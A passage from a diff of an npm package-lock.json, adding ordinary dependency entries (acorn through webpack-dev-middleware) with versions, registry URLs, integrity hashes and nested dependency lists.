"https://registry.npmjs.org/acorn/-/acorn-8.14.1.tgz", + "integrity": "sha512-OvQ/2pUDKmgfCg++xsTX1wGxfTaszcHVcTctW4UJB4hibJx2HXxxO5UmVgyjMa+ZDsiaf5wWLXYpRWMmBI0QHg==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/unset-value": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unset-value/-/unset-value-1.0.0.tgz", + "integrity": "sha512-PcA2tsuGSF9cnySLHTLSh2qrQiJ70mn+r+Glzxv2TWZblxsxCC52BDlZoPCsz7STd9pN7EZetkWZBAvk4cgZdQ==", + "dev": true, + "dependencies": { + "has-value": "^0.3.1", + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-value": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/has-value/-/has-value-0.3.1.tgz", + "integrity": "sha512-gpG936j8/MzaeID5Yif+577c17TxaDmhuyVgSwtnL/q8UUTySg8Mecb+8Cf1otgLoD7DDH75axp86ER7LFsf3Q==", + "dev": true, + "dependencies": { + "get-value": "^2.0.3", + "has-values": "^0.1.4", + "isobject": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-value/node_modules/isobject": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/isobject/-/isobject-2.1.0.tgz", + "integrity": "sha512-+OUdGJlgjOBZDfxnDjYYG6zp487z0JGNQq3cYQYg5f5hKR+syHMsaztzGeml/4kGG55CSpKSpWTY+jYGgsHLgA==", + "dev": true, + "dependencies": { + "isarray": "1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-values": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/has-values/-/has-values-0.1.4.tgz", + "integrity": "sha512-J8S0cEdWuQbqD9//tlZxiMuMNmxB8PlEwvYwuxsTmR1G5RXUePEX/SJn7aD0GMLieuZYSwNH0cQuJGwnYunXRQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", + "dev": true + }, + "node_modules/untildify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/untildify/-/untildify-4.0.0.tgz", + "integrity": "sha512-KK8xQ1mkzZeg9inewmFVDNkg3l5LUhoq9kN6iWYB/CC9YMG8HA+c1Q8HwDe6dEX7kErrEVNVBO3fWsVq5iDgtw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.0.tgz", + "integrity": "sha512-EdRAaAyk2cUE1wOf2DkEhzxqOQvFOoRJFNS6NeyJ01Gp2beMRpBAINjM2iDXE3KCuKhwnvHIQCJm6ThL2Z+HzQ==", + "dev": true, + "funding": [ 
+ { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "escalade": "^3.1.2", + "picocolors": "^1.0.1" + }, + "bin": { + "update-browserslist-db": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/uri-js": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", + "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "dependencies": { + "punycode": "^2.1.0" + } + }, + "node_modules/urix": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/urix/-/urix-0.1.0.tgz", + "integrity": "sha512-Am1ousAhSLBeB9cG/7k7r2R0zj50uDRlZHPGbazid5s9rlF1F/QKYObEKSIunSjIOkJZqwRRLpvewjEkM7pSqg==", + "deprecated": "Please see https://github.com/lydell/urix#deprecated", + "dev": true + }, + "node_modules/url": { + "version": "0.10.3", + "resolved": "https://registry.npmjs.org/url/-/url-0.10.3.tgz", + "integrity": "sha1-Ah5NnHcF8hu/N9A861h2dAJ3TGQ=", + "dependencies": { + "punycode": "1.3.2", + "querystring": "0.2.0" + } + }, + "node_modules/url-loader": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/url-loader/-/url-loader-4.1.1.tgz", + "integrity": "sha512-3BTV812+AVHHOJQO8O5MkWgZ5aosP7GnROJwvzLS9hWDj00lZ6Z0wNak423Lp9PBZN05N+Jk/N5Si8jRAlGyWA==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "mime-types": "^2.1.27", + "schema-utils": "^3.0.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "file-loader": "*", + "webpack": "^4.0.0 || ^5.0.0" + }, + "peerDependenciesMeta": { + "file-loader": { + "optional": true + } + } + }, + "node_modules/url-parse": { + "version": "1.5.10", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.10.tgz", + "integrity": "sha512-WypcfiRhfeUP9vvF0j6rw0J3hrWrw6iZv3+22h6iRMJ/8z1Tj6XfLP4DsUix5MhMPnXpiHDoKyoZ/bdCkwBCiQ==", + "dependencies": { + "querystringify": "^2.1.1", + "requires-port": "^1.0.0" + } + }, + "node_modules/url-template": { + "version": "2.0.8", + "resolved": "https://registry.npmjs.org/url-template/-/url-template-2.0.8.tgz", + "integrity": "sha512-XdVKMF4SJ0nP/O7XIPB0JwAEuT9lDIYnNsK8yGVe43y0AWoKeJNdv3ZNWh7ksJ6KqQFjOO6ox/VEitLnaVNufw==" + }, + "node_modules/url/node_modules/punycode": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", + "integrity": "sha1-llOgNvt8HuQjQvIyXM7v6jkmxI0=" + }, + "node_modules/use": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/use/-/use-3.1.1.tgz", + "integrity": "sha512-cwESVXlO3url9YWlFW/TA9cshCEhtu7IKJ/p5soJ/gGpj7vbvFrAY/eIioQ6Dw23KjZhYgiIo8HOs1nQ2vr/oQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/utf-8-validate": { + "version": "5.0.8", + "resolved": "https://registry.npmjs.org/utf-8-validate/-/utf-8-validate-5.0.8.tgz", + "integrity": "sha512-k4dW/Qja1BYDl2qD4tOMB9PFVha/UJtxTc1cXYOe3WwA/2m0Yn4qB7wLMpJyLJ/7DR0XnTut3HsCSzDT4ZvKgA==", + "hasInstallScript": true, + "dependencies": { + "node-gyp-build": "^4.3.0" + }, + "engines": { + "node": ">=6.14.2" + } + }, + "node_modules/utf-8-validate/node_modules/node-gyp-build": { + "version": "4.3.0", + "resolved": 
"https://registry.npmjs.org/node-gyp-build/-/node-gyp-build-4.3.0.tgz", + "integrity": "sha512-iWjXZvmboq0ja1pUGULQBexmxq8CV4xBhX7VDOTbL7ZR4FOowwY/VOtRxBN/yKxmdGoIp4j5ysNT4u3S2pDQ3Q==", + "bin": { + "node-gyp-build": "bin.js", + "node-gyp-build-optional": "optional.js", + "node-gyp-build-test": "build-test.js" + } + }, + "node_modules/utf8-byte-length": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/utf8-byte-length/-/utf8-byte-length-1.0.4.tgz", + "integrity": "sha512-4+wkEYLBbWxqTahEsWrhxepcoVOJ+1z5PGIjPZxRkytcdSUaNjIjBM7Xn8E+pdSuV7SzvWovBFA54FO0JSoqhA==", + "dev": true + }, + "node_modules/util": { + "version": "0.12.5", + "resolved": "https://registry.npmjs.org/util/-/util-0.12.5.tgz", + "integrity": "sha512-kZf/K6hEIrWHI6XqOFUiiMa+79wE/D8Q+NCNAWclkyg3b4d2k7s0QGepNjiABc+aR3N1PAyHL7p6UcLY6LmrnA==", + "dependencies": { + "inherits": "^2.0.3", + "is-arguments": "^1.0.4", + "is-generator-function": "^1.0.7", + "is-typed-array": "^1.1.3", + "which-typed-array": "^1.1.2" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha1-RQ1Nyfpw3nMnYvvS1KKJgUGaDM8=" + }, + "node_modules/util.promisify": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/util.promisify/-/util.promisify-1.1.1.tgz", + "integrity": "sha512-/s3UsZUrIfa6xDhr7zZhnE9SLQ5RIXyYfiVnMMyMDzOc8WhWN4Nbh36H842OyurKbCDAesZOJaVyvmSl6fhGQw==", + "dependencies": { + "call-bind": "^1.0.0", + "define-properties": "^1.1.3", + "for-each": "^0.3.3", + "has-symbols": "^1.0.1", + "object.getownpropertydescriptors": "^2.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/utila": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/utila/-/utila-0.4.0.tgz", + "integrity": "sha1-ihagXURWV6Oupe7MWxKk+lN5dyw=", + "dev": true + }, + "node_modules/utils-flatten": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/utils-flatten/-/utils-flatten-1.0.0.tgz", + "integrity": "sha1-AfMNMZO+RkxAsxdV5nQNDbDO8kM=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/utils-merge": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "integrity": "sha1-n5VxD1CiZ5R7LMwSR0HBAoQn5xM=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/v8-compile-cache": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.4.0.tgz", + "integrity": "sha512-ocyWc3bAHBB/guyqJQVI5o4BZkPhznPYUG2ea80Gond/BgNWpap8TOmLSeeQG7bnh2KMISxskdADG59j7zruhw==", + "dev": true + }, + "node_modules/v8-to-istanbul": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", + "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.12", + "@types/istanbul-lib-coverage": "^2.0.1", + "convert-source-map": "^1.6.0" + }, + "engines": { + "node": ">=10.12.0" + } + }, + "node_modules/valid-data-url": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/valid-data-url/-/valid-data-url-2.0.0.tgz", + "integrity": "sha512-dyCZnv3aCey7yfTgIqdZanKl7xWAEEKCbgmR7SKqyK6QT/Z07ROactrgD1eA37C69ODRj7rNOjzKWVPh0EUjBA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/valid-url": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/valid-url/-/valid-url-1.0.9.tgz", + "integrity": "sha1-HBRHm0DxOXp1eC8RXkCGRHQzogA=" + }, + "node_modules/validate-npm-package-license": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", + "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", + "dev": true, + "dependencies": { + "spdx-correct": "^3.0.0", + "spdx-expression-parse": "^3.0.0" + } + }, + "node_modules/validator": { + "version": "13.7.0", + "resolved": "https://registry.npmjs.org/validator/-/validator-13.7.0.tgz", + "integrity": "sha512-nYXQLCBkpJ8X6ltALua9dRrZDHVYxjJ1wgskNt1lH9fzGjs3tgojGSCBjmEPwkWS1y29+DrizMTW19Pr9uB2nw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/value-or-function": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/value-or-function/-/value-or-function-4.0.0.tgz", + "integrity": "sha512-aeVK81SIuT6aMJfNo9Vte8Dw0/FZINGBV8BfCraGtqVxIeLAEhJyoWs8SmvRVmXfGss2PmmOwZCuBPbZR+IYWg==", + "dev": true, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/vary": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "integrity": "sha1-IpnwLG3tMNSllhsLn3RSShj2NPw=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/verror": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", + "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "^1.0.0", + "core-util-is": "1.0.2", + "extsprintf": "^1.2.0" + } + }, + "node_modules/verror/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/vinyl": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/vinyl/-/vinyl-3.0.0.tgz", + "integrity": "sha512-rC2VRfAVVCGEgjnxHUnpIVh3AGuk62rP3tqVrn+yab0YH7UULisC085+NYH+mnqf3Wx4SpSi1RQMwudL89N03g==", + "dev": true, + "dependencies": { + "clone": "^2.1.2", + "clone-stats": "^1.0.0", + "remove-trailing-separator": "^1.1.0", + "replace-ext": "^2.0.0", + "teex": "^1.0.1" + }, + "engines": { + "node": 
">=10.13.0" + } + }, + "node_modules/vinyl-contents": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/vinyl-contents/-/vinyl-contents-2.0.0.tgz", + "integrity": "sha512-cHq6NnGyi2pZ7xwdHSW1v4Jfnho4TEGtxZHw01cmnc8+i7jgR6bRnED/LbrKan/Q7CvVLbnvA5OepnhbpjBZ5Q==", + "dev": true, + "dependencies": { + "bl": "^5.0.0", + "vinyl": "^3.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-contents/node_modules/bl": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-5.1.0.tgz", + "integrity": "sha512-tv1ZJHLfTDnXE6tMHv73YgSJaWR2AFuPwMntBe7XL/GBFHnT0CLnsHMogfk5+GzCDC5ZWarSCYaIGATZt9dNsQ==", + "dev": true, + "dependencies": { + "buffer": "^6.0.3", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/vinyl-contents/node_modules/buffer": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": "sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "node_modules/vinyl-contents/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/vinyl-fs": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/vinyl-fs/-/vinyl-fs-4.0.0.tgz", + "integrity": "sha512-7GbgBnYfaquMk3Qu9g22x000vbYkOex32930rBnc3qByw6HfMEAoELjCjoJv4HuEQxHAurT+nvMHm6MnJllFLw==", + "dev": true, + "dependencies": { + "fs-mkdirp-stream": "^2.0.1", + "glob-stream": "^8.0.0", + "graceful-fs": "^4.2.11", + "iconv-lite": "^0.6.3", + "is-valid-glob": "^1.0.0", + "lead": "^4.0.0", + "normalize-path": "3.0.0", + "resolve-options": "^2.0.0", + "stream-composer": "^1.0.2", + "streamx": "^2.14.0", + "to-through": "^3.0.0", + "value-or-function": "^4.0.0", + "vinyl": "^3.0.0", + "vinyl-sourcemap": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-fs/node_modules/iconv-lite": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", + "dev": true, + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/vinyl-sourcemap": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/vinyl-sourcemap/-/vinyl-sourcemap-2.0.0.tgz", + "integrity": "sha512-BAEvWxbBUXvlNoFQVFVHpybBbjW1r03WhohJzJDSfgrrK5xVYIDTan6xN14DlyImShgDRv2gl9qhM6irVMsV0Q==", + "dev": true, + "dependencies": { + "convert-source-map": "^2.0.0", + "graceful-fs": "^4.2.10", + "now-and-later": "^3.0.0", + "streamx": "^2.12.5", + "vinyl": "^3.0.0", + "vinyl-contents": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + 
"node_modules/vinyl-sourcemap/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/void-elements": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/void-elements/-/void-elements-3.1.0.tgz", + "integrity": "sha512-Dhxzh5HZuiHQhbvTW9AMetFfBHDMYpo23Uo9btPXgdYP+3T5S+p+jgNy7spra+veYhBP2dCSgxR/i2Y02h5/6w==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/w3c-hr-time": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/w3c-hr-time/-/w3c-hr-time-1.0.2.tgz", + "integrity": "sha512-z8P5DvDNjKDoFIHK7q8r8lackT6l+jo/Ye3HOle7l9nICP9lf1Ci25fy9vHd0JOWewkIFzXIEig3TdKT7JQ5fQ==", + "dev": true, + "dependencies": { + "browser-process-hrtime": "^1.0.0" + } + }, + "node_modules/w3c-keyname": { + "version": "2.2.8", + "resolved": "https://registry.npmjs.org/w3c-keyname/-/w3c-keyname-2.2.8.tgz", + "integrity": "sha512-dpojBhNsCNN7T82Tm7k26A6G9ML3NkhDsnw9n/eoxSRlVBB4CEtIQ/KTCLI2Fwf3ataSXRhYFkQi3SlnFwPvPQ==", + "dev": true + }, + "node_modules/w3c-xmlserializer": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-3.0.0.tgz", + "integrity": "sha512-3WFqGEgSXIyGhOmAFtlicJNMjEps8b1MG31NCA0/vOF9+nKMUW1ckhi9cnNHmf88Rzw5V+dwIwsm2C7X8k9aQg==", + "dev": true, + "dependencies": { + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/walk-up-path": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/walk-up-path/-/walk-up-path-3.0.1.tgz", + "integrity": "sha512-9YlCL/ynK3CTlrSRrDxZvUauLzAswPCrsaCgilqFevUYpeEW0/3ScEjaa3kbW/T0ghhkEr7mv+fpjqn1Y1YuTA==", + "dev": true, + "license": "ISC" + }, + "node_modules/walkdir": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/walkdir/-/walkdir-0.4.1.tgz", + "integrity": "sha512-3eBwRyEln6E1MSzcxcVpQIhRG8Q1jLvEqRmCZqS3dsfXEDR/AhOF4d+jHg1qvDCpYaVRZjENPQyrVxAkQqxPgQ==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/watchpack": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/watchpack/-/watchpack-2.4.1.tgz", + "integrity": "sha512-8wrBCMtVhqcXP2Sup1ctSkga6uc2Bx0IIvKyT7yTFier5AXHooSI+QyQQAtTb7+E0IUCCKyTFmXqdqgum2XWGg==", + "dev": true, + "dependencies": { + "glob-to-regexp": "^0.4.1", + "graceful-fs": "^4.1.2" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/wbuf": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/wbuf/-/wbuf-1.7.3.tgz", + "integrity": "sha512-O84QOnr0icsbFGLS0O3bI5FswxzRr8/gHwWkDlQFskhSPryQXvrTMxjxGP4+iWYoauLoBvfDpkrOauZ+0iZpDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "minimalistic-assert": "^1.0.0" + } + }, + "node_modules/web-streams-polyfill": { + "version": "4.0.0-beta.1", + "resolved": "https://registry.npmjs.org/web-streams-polyfill/-/web-streams-polyfill-4.0.0-beta.1.tgz", + "integrity": "sha512-3ux37gEX670UUphBF9AMCq8XM6iQ8Ac6A+DSRRjDoRBm1ufCkaCDdNVbaqq60PsEkdNlLKrGtv/YBP4EJXqNtQ==", + "engines": { + "node": ">= 12" + } + }, + "node_modules/webidl-conversions": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-7.0.0.tgz", + "integrity": "sha512-VwddBukDzu71offAQR975unBIGqfKZpM+8ZX6ySk8nYhVoo5CYaZyzt3YBvYtRtO+aoGlqxPg/B87NGVZ/fu6g==", + "engines": { + "node": ">=12" + } + }, + "node_modules/webpack": { + "version": 
"5.98.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-5.98.0.tgz", + "integrity": "sha512-UFynvx+gM44Gv9qFgj0acCQK2VE1CtdfwFdimkapco3hlPCJ/zeq73n2yVKimVbtm+TnApIugGhLJnkU6gjYXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/eslint-scope": "^3.7.7", + "@types/estree": "^1.0.6", + "@webassemblyjs/ast": "^1.14.1", + "@webassemblyjs/wasm-edit": "^1.14.1", + "@webassemblyjs/wasm-parser": "^1.14.1", + "acorn": "^8.14.0", + "browserslist": "^4.24.0", + "chrome-trace-event": "^1.0.2", + "enhanced-resolve": "^5.17.1", + "es-module-lexer": "^1.2.1", + "eslint-scope": "5.1.1", + "events": "^3.2.0", + "glob-to-regexp": "^0.4.1", + "graceful-fs": "^4.2.11", + "json-parse-even-better-errors": "^2.3.1", + "loader-runner": "^4.2.0", + "mime-types": "^2.1.27", + "neo-async": "^2.6.2", + "schema-utils": "^4.3.0", + "tapable": "^2.1.1", + "terser-webpack-plugin": "^5.3.11", + "watchpack": "^2.4.1", + "webpack-sources": "^3.2.3" + }, + "bin": { + "webpack": "bin/webpack.js" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependenciesMeta": { + "webpack-cli": { + "optional": true + } + } + }, + "node_modules/webpack-assets-manifest": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/webpack-assets-manifest/-/webpack-assets-manifest-5.2.1.tgz", + "integrity": "sha512-MsEcXVio1GY6R+b4dVfTHIDMB0RB90KajQG8neRbH92vE2S1ClGw9mNa9NPlratYBvZOhExmN0qqMNFTaCTuIg==", + "dev": true, + "dependencies": { + "chalk": "^4.1.2", + "deepmerge": "^4.3.1", + "lockfile": "^1.0.4", + "lodash.get": "^4.4.2", + "lodash.has": "^4.5.2", + "schema-utils": "^3.3.0", + "tapable": "^2.2.1" + }, + "engines": { + "node": ">=10.13.0" + }, + "peerDependencies": { + "webpack": "^5.2.0" + } + }, + "node_modules/webpack-assets-manifest/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/webpack-assets-manifest/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/webpack-assets-manifest/node_modules/deepmerge": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/webpack-assets-manifest/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/webpack-cli": { + "version": 
"5.1.4", + "resolved": "https://registry.npmjs.org/webpack-cli/-/webpack-cli-5.1.4.tgz", + "integrity": "sha512-pIDJHIEI9LR0yxHXQ+Qh95k2EvXpWzZ5l+d+jIo+RdSm9MiHfzazIxwwni/p7+x4eJZuvG1AJwgC4TNQ7NRgsg==", + "dev": true, + "dependencies": { + "@discoveryjs/json-ext": "^0.5.0", + "@webpack-cli/configtest": "^2.1.1", + "@webpack-cli/info": "^2.0.2", + "@webpack-cli/serve": "^2.0.5", + "colorette": "^2.0.14", + "commander": "^10.0.1", + "cross-spawn": "^7.0.3", + "envinfo": "^7.7.3", + "fastest-levenshtein": "^1.0.12", + "import-local": "^3.0.2", + "interpret": "^3.1.1", + "rechoir": "^0.8.0", + "webpack-merge": "^5.7.3" + }, + "bin": { + "webpack-cli": "bin/cli.js" + }, + "engines": { + "node": ">=14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "5.x.x" + }, + "peerDependenciesMeta": { + "@webpack-cli/generators": { + "optional": true + }, + "webpack-bundle-analyzer": { + "optional": true + }, + "webpack-dev-server": { + "optional": true + } + } + }, + "node_modules/webpack-cli/node_modules/commander": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-10.0.1.tgz", + "integrity": "sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==", + "dev": true, + "engines": { + "node": ">=14" + } + }, + "node_modules/webpack-cli/node_modules/interpret": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/interpret/-/interpret-3.1.1.tgz", + "integrity": "sha512-6xwYfHbajpoF0xLW+iwLkhwgvLoZDfjYfoFNu8ftMoXINzwuymNLd9u/KmwtdT2GbR+/Cz66otEGEVVUHX9QLQ==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-dev-middleware": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-7.4.2.tgz", + "integrity": "sha512-xOO8n6eggxnwYpy1NlzUKpvrjfJTvae5/D6WOK0S2LSo7vjmo5gCM1DbLUmFqrMTJP+W/0YZNctm7jasWvLuBA==", + "dev": true, + "license": "MIT", + "dependencies": { + "colorette": "^2.0.10", + "memfs": 